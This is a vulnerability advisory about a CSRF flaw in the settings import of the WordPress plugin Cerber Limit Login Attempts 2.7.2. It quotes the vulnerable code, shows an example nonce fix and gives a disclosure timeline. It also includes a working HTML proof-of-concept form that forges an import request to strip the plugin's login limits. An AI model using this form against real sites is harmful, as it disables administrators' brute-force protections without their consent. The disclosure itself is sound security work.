Cross-Site Request Forgery (CSRF)/Settings Change Vulnerability in Cerber Limit Login Attempts
We have recently been doing some basic security checks on WordPress plugins that log login and user activity, and through that we came across the plugin Cerber Limit Login Attempts. (In addition to logging login attempts, the plugin prominently promotes itself as protecting against brute force attacks, despite the fact that those are not happening.)
In looking over the plugin we found that it has a tool for importing the plugin's settings, and as of version 2.7.2 that tool did not include protection against cross-site request forgery (CSRF). So if you could get a logged-in administrator to access a page you control, you could cause the settings to be changed and remove the limits it puts on login attempts.
In version 2.7.2 the code that handles the import starts with the following code:
```php
add_action('admin_init','cerber_import');
function cerber_import(){
	global $wpdb;
	if ($_SERVER['REQUEST_METHOD']!='POST' || !isset($_POST['cerber_import'])) return;
	if (!current_user_can('manage_options')) wp_die('Upload failed.');
	// The capability is checked, but no nonce is verified before the request is acted on.
	$ok = true;
	if (!is_uploaded_file($_FILES['ifile']['tmp_name'])) {
		update_site_option('cerber_admin_notice',__('No file was uploaded or file is corrupted','cerber'));
		return;
	}
	elseif ($file = file_get_contents($_FILES['ifile']['tmp_name'])) {
```
The code in the function does check that only Administrator-level users are able to do an import, by checking whether the user can "manage_options", but no nonce check is done, which leads to the CSRF issue.
A week ago we contacted the developer, who responded that it would be fixed soon. Today version 2.9 was released, which fixes the vulnerability by adding a nonce to the import form and checking it when a request for an import is sent.
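To illustrate the kind of fix described, here is the import handler from the excerpt above with a nonce added to the form and verified in the handler. This is an added example, not the plugin's own 2.9 code; the nonce action and field names `cerber_import` and `_cerber_import_nonce` are assumptions chosen for illustration.

```php
<?php
// Added example, not the plugin's code. The nonce action 'cerber_import' and
// the field name '_cerber_import_nonce' are assumed names for illustration.

// Form side: emit a nonce field inside the import form on the tools tab.
function cerber_example_import_form() {
    ?>
    <form method="POST" enctype="multipart/form-data">
        <?php wp_nonce_field( 'cerber_import', '_cerber_import_nonce' ); ?>
        <input type="file" name="ifile" />
        <input type="submit" name="cerber_import" value="Import" />
    </form>
    <?php
}

// Handler side: the checks from the 2.7.2 excerpt, plus the missing nonce check.
add_action( 'admin_init', 'cerber_example_import' );
function cerber_example_import() {
    if ( $_SERVER['REQUEST_METHOD'] !== 'POST' || ! isset( $_POST['cerber_import'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Upload failed.' );
    }
    // A form on a third-party page cannot include a nonce valid for this user
    // and action, so a forged request stops here. check_admin_referer() calls
    // wp_die() when the nonce is missing or invalid.
    check_admin_referer( 'cerber_import', '_cerber_import_nonce' );

    if ( empty( $_FILES['ifile']['tmp_name'] ) || ! is_uploaded_file( $_FILES['ifile']['tmp_name'] ) ) {
        update_site_option( 'cerber_admin_notice', __( 'No file was uploaded or file is corrupted', 'cerber' ) );
        return;
    }
    // ... parse the uploaded settings file and apply it, as the plugin does.
}
```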
Proof of Concept
The following proof of concept will cause the plugin's settings to be changed to what is specified in the uploaded file, when logged in to WordPress as an Administrator.
Make sure to replace "[path to WordPress]" with the location of WordPress. The plugin's export tool can be used to generate a settings file to be imported.
```html
<html>
  <body>
    <form action="http://[path to WordPress]/wp-admin/options-general.php?page=cerber-settings&tab=tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="importset" value="1" />
      <input type="hidden" name="importacl" value="1" />
      <input type="file" name="ifile" />
      <input type="submit" name="cerber_import" value="Submit" />
    </form>
  </body>
</html>
```
Timeline
- 8/22/2016 – Developer notified.
- 8/29/2016 – Version 2.9 released, which fixes vulnerability.